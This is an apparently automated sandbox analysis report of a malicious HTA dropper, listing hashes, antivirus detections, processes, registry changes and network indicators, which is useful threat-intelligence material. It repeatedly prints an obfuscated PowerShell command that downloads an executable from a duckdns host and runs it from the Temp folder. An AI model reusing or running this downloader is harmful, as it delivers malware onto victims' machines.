paladin316

Auszahlungsanweisung_hta_2019-08-29_02_30.txt

Aug 28th, 2019
  1.  
  2. * ID: 395
  3. * MalFamily: ""
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Auszahlungsanweisung.hta"
  8. * File Size: 12537
  9. * File Type: "HTML document, ASCII text, with very long lines, with CRLF line terminators"
  10. * SHA256: "b636b8a8ac2d6ec1a4fcbb5444ff7a9cc721aa7766a85d03823e2be98392d473"
  11. * MD5: "5fdd9504398dd82b20ea814e6091c55e"
  12. * SHA1: "09f414750aa2966cea9f29ca2baa4482f5cb3d96"
  13. * SHA512: "16fde83fb041f8eadaf915d309d518bed2c4777241fab5f57ae1e905a58fc6b6ad9e2d014229088206a639addff906be5b7c44ecd0a205983bccd27cd1fa7ab6"
  14. * CRC32: "20442F8B"
  15. * SSDEEP: "192:EaTLEmwbyaf1QTjGH0hOQHW3nRkQ4fNnaQBYgwri6toT:tLEmwbyaf1QTyH0wQHGnRkQ4paQBP"
  16.  
  17. * Process Execution:
  18. "mshta.exe",
  19. "poWERSHeLl.EXe",
  20. "VirtualoxPureSDLFrontend.exe"
  21.  
  22.  
  23. * Executed Commands:
  24. "\"C:\\Windows\\sysTeM32\\wiNDOWspoWeRSHELL\\V1.0\\poWERSHeLl.EXe\" \"\t\t \t(\t\t\t\t &('NeW-OBj' + 'EcT' )\t\t \tnEt.WebClieNT \t).DOwNLoadFilE( \t\\xe2\\x80\\x9dhttp://westernautoweb.duckdns.org:8447/sol.exe\\xe2\\x80\\x9d \t,\t\t\t\\xe2\\x80\\x9d$enV:TEmp\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\t \t) \t; \tsTaRT \t \\xe2\\x80\\x9d$ENV:TEMP\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\"",
  25. "\"C:\\Users\\user\\AppData\\Local\\Temp\\VirtualoxPureSDLFrontend.exe\"",
  26. "C:\\Users\\user\\AppData\\Local\\Temp\\VirtualoxPureSDLFrontend.exe "
  27.  
  28.  
  29. * Signatures Detected:
  30.  
  31. "Description": "Behavioural detection: Executable code extraction",
  32. "Details":
  33.  
  34.  
  35. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  36. "Details":
  37.  
  38.  
  39. "Description": "Guard pages use detected - possible anti-debugging.",
  40. "Details":
  41.  
  42.  
  43. "Description": "A HTTP/S link was seen in a script or command line",
  44. "Details":
  45.  
  46. "command": "\"C:\\Windows\\sysTeM32\\wiNDOWspoWeRSHELL\\V1.0\\poWERSHeLl.EXe\" \"\t\t \t(\t\t\t\t &('NeW-OBj' + 'EcT' )\t\t \tnEt.WebClieNT \t).DOwNLoadFilE( \t\\xe2\\x80\\x9dhttp://westernautoweb.duckdns.org:8447/sol.exe\\xe2\\x80\\x9d \t,\t\t\t\\xe2\\x80\\x9d$enV:TEmp\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\t \t) \t; \tsTaRT \t \\xe2\\x80\\x9d$ENV:TEMP\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\""
  47.  
  48.  
  49.  
  50.  
  51. "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
  52. "Details":
  53.  
  54. "command": "\"C:\\Windows\\sysTeM32\\wiNDOWspoWeRSHELL\\V1.0\\poWERSHeLl.EXe\" \"\t\t \t(\t\t\t\t &('NeW-OBj' + 'EcT' )\t\t \tnEt.WebClieNT \t).DOwNLoadFilE( \t\\xe2\\x80\\x9dhttp://westernautoweb.duckdns.org:8447/sol.exe\\xe2\\x80\\x9d \t,\t\t\t\\xe2\\x80\\x9d$enV:TEmp\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\t \t) \t; \tsTaRT \t \\xe2\\x80\\x9d$ENV:TEMP\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\""
  55.  
  56.  
  57.  
  58.  
  59. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  60. "Details":
  61.  
  62. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  63.  
  64.  
  65. "suspicious_request": "http://westernautoweb.duckdns.org:8447/sol.exe"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Performs some HTTP requests",
  71. "Details":
  72.  
  73. "url": "http://westernautoweb.duckdns.org:8447/sol.exe"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "A scripting utility was executed",
  79. "Details":
  80.  
  81. "command": "\"C:\\Windows\\sysTeM32\\wiNDOWspoWeRSHELL\\V1.0\\poWERSHeLl.EXe\" \"\t\t \t(\t\t\t\t &('NeW-OBj' + 'EcT' )\t\t \tnEt.WebClieNT \t).DOwNLoadFilE( \t\\xe2\\x80\\x9dhttp://westernautoweb.duckdns.org:8447/sol.exe\\xe2\\x80\\x9d \t,\t\t\t\\xe2\\x80\\x9d$enV:TEmp\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\t \t) \t; \tsTaRT \t \\xe2\\x80\\x9d$ENV:TEMP\\VirtualoxPureSDLFrontend.exe\\xe2\\x80\\x9d\""
  82.  
  83.  
  84.  
  85.  
  86. "Description": "Attempts to execute a powershell command with suspicious parameter/s",
  87. "Details":
  88.  
  89. "file_download": "Uses powershell to download a file"
  90.  
  91.  
  92.  
  93.  
  94. "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
  95. "Details":
  96.  
  97. "Baidu": "JS.Trojan.Kryptik.to"
  98.  
  99.  
  100. "Symantec": "Downloader"
  101.  
  102.  
  103. "ESET-NOD32": "PowerShell/TrojanDownloader.Agent.QV"
  104.  
  105.  
  106. "TrendMicro-HouseCall": "Trojan.HTML.POWLOAD.THHBHAI"
  107.  
  108.  
  109. "Kaspersky": "HEUR:Trojan.Script.SAgent.gen"
  110.  
  111.  
  112. "NANO-Antivirus": "Trojan.Script.ExpKit.eurlzq"
  113.  
  114.  
  115. "AegisLab": "Trojan.Script.SAgent.4!c"
  116.  
  117.  
  118. "Rising": "Downloader.Agent!8.B23 (TOPIS:E0:HZ7GGfTwi0Q)"
  119.  
  120.  
  121. "F-Secure": "Malware.HTML/Agent.bbk"
  122.  
  123.  
  124. "DrWeb": "Trojan.DownLoader30.15068"
  125.  
  126.  
  127. "TrendMicro": "Trojan.HTML.POWLOAD.THHBHAI"
  128.  
  129.  
  130. "McAfee-GW-Edition": "BehavesLike.HTML.Downloader.lx"
  131.  
  132.  
  133. "ZoneAlarm": "HEUR:Trojan.Script.SAgent.gen"
  134.  
  135.  
  136. "GData": "HTML.Trojan.Agent.SXTTZC"
  137.  
  138.  
  139. "Zoner": "Probably HTMLUnescape"
  140.  
  141.  
  142. "Tencent": "Win32.Trojan-downloader.Agent.Tbjh"
  143.  
  144.  
  145. "Ikarus": "Trojan-Downloader.PowerShell.Agent"
  146.  
  147.  
  148. "Qihoo-360": "Win32/Trojan.Script.b80"
  149.  
  150.  
  151.  
  152.  
  153. "Description": "Drops a binary and executes it",
  154. "Details":
  155.  
  156. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\VirtualoxPureSDLFrontend.exe"
  157.  
  158.  
  159.  
  160.  
  161. "Description": "Created network traffic indicative of malicious activity",
  162. "Details":
  163.  
  164. "signature": "ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile"
  165.  
  166.  
  167.  
  168.  
  169.  
  170. * Started Service:
  171.  
  172. * Mutexes:
  173. "CicLoadWinStaWinSta0",
  174. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  175. "Global\\CLR_PerfMon_WrapMutex",
  176. "Global\\CLR_CASOFF_MUTEX",
  177. "Global\\.net clr networking"
  178.  
  179.  
  180. * Modified Files:
  181. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  182. "\\??\\PIPE\\srvsvc",
  183. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\RV40Z3BSV7K62H76GA4B.temp",
  184. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
  185. "C:\\Users\\user\\AppData\\Local\\Temp\\VirtualoxPureSDLFrontend.exe"
  186.  
  187.  
  188. * Deleted Files:
  189. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\RV40Z3BSV7K62H76GA4B.temp",
  190. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2372.25631515",
  191. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2372.25631515",
  192. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2372.25631515"
  193.  
  194.  
  195. * Modified Registry Keys:
  196. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  197. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32",
  198. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\EnableFileTracing",
  199. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\EnableConsoleTracing",
  200. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\FileTracingMask",
  201. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\ConsoleTracingMask",
  202. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\MaxFileSize",
  203. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\poWERSHeLl_RASAPI32\\FileDirectory"
  204.  
  205.  
  206. * Deleted Registry Keys:
  207.  
  208. * DNS Communications:
  209.  
  210. "type": "A",
  211. "request": "westernautoweb.duckdns.org",
  212. "answers":
  213.  
  214. "data": "79.134.225.95",
  215. "type": "A"
  216.  
  217.  
  218.  
  219.  
  220.  
  221. * Domains:
  222.  
  223. "ip": "79.134.225.95",
  224. "domain": "westernautoweb.duckdns.org"
  225.  
  226.  
  227.  
  228. * Network Communication - ICMP:
  229.  
  230. * Network Communication - HTTP:
  231.  
  232. "count": 1,
  233. "body": "",
  234. "uri": "http://westernautoweb.duckdns.org:8447/sol.exe",
  235. "user-agent": "",
  236. "method": "GET",
  237. "host": "westernautoweb.duckdns.org:8447",
  238. "version": "1.1",
  239. "path": "/sol.exe",
  240. "data": "GET /sol.exe HTTP/1.1\r\nHost: westernautoweb.duckdns.org:8447\r\nConnection: Keep-Alive\r\n\r\n",
  241. "port": 8447
  242.  
  243.  
  244.  
  245. * Network Communication - SMTP:
  246.  
  247. * Network Communication - Hosts:
  248.  
  249. "country_name": "Switzerland",
  250. "ip": "79.134.225.95",
  251. "inaddrarpa": "",
  252. "hostname": "westernautoweb.duckdns.org"
  253.  
  254.  
  255.  
  256. * Network Communication - IRC: